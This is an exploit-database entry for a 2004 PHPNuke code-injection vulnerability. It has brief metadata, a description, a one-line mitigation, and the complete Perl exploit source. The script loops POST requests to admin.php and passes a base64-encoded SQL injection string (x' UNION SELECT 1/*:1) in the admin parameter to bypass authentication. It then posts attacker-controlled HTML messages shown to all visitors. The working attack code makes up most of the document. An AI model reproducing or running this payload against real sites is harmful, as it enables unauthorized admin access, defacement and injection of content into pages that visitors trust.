Perl script for exploiting PHPNuke vulnerability

vendor:

PHPNuke

by:

Unknown

7.5

CVSS

HIGH

Code Injection

CWE

Product Name: PHPNuke

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2004

Perl script for exploiting PHPNuke vulnerability

This Perl script is used to exploit a vulnerability in PHPNuke. It allows an attacker to inject arbitrary code and create a new message in the admin panel. The script sends a POST request with the necessary parameters to the admin.php endpoint of the target website. The injected code is executed when the message is viewed by visitors. This exploit was published on milw0rm.com on September 16, 2004.

Mitigation:

To mitigate this vulnerability, it is recommended to update PHPNuke to the latest version, as this vulnerability has likely been patched in newer releases. Additionally, it is important to regularly update and secure web applications to prevent code injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#

use LWP; 

$log = "pos_komen_phpnuke_savemsg.txt"; 
$Agent = "Mbahmubangga/1.0";
$proxy = "http://172.9.1.11:80/"; # proxy:port ...
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);

$url = 'http://www.sitewithphpnuke.com/admin.php';

$browser->proxy(http => $proxy) if defined($proxy);

printlog ("\nProcessing: $url\n");

for ($a = 1; $a < 11 ; $a++) {

$mid=$a;

$loginpost = $url;
$loginrequest = HTTP::Request->new(POST => $loginpost);
$loginrequest->content_type('application/x-www-form-urlencoded');
$loginsend = 
'title=<h1>JUST TESTING</h1>'.
'&content=you can put HTML format here, all up to you now, 1 liner of course,
or multiple liner with dot'.
'&mlanguage='. #message language
'&expire=0'. #unlimited
'&active=1'. #yes
'&chng_date=0'.
'&view=1'. #all visitors
'&mdate='.
'&mid='.$mid. #the message id, commonly has value under 11
'&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'. #our magic ammo ==> x'%20UNION%20SELECT%201/*:1
'&add_radminsuper=1'. #the super user / G O D
'&op=savemsg'; #operation
$loginrequest->content-length($loginsend);
$loginrequest->content($loginsend);
$loginresponse = $browser->request($loginrequest);
$logincek = $loginresponse->as_string;
#print ($logincek);


if ($logincek =~ /(500 Can\'t read entity body\: Unknown error)|(411 Length Required)/){
printlog ("$mid attempting edit and saving message sending OK ".$loginresponse-
>status_line ."\n") ;
}
else {
printlog ("Could be failure ".$loginresponse->status_line ."\n");
last;
}

} #end of for

sub printlog {
print @_[0]; 
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}

# milw0rm.com [2004-09-16]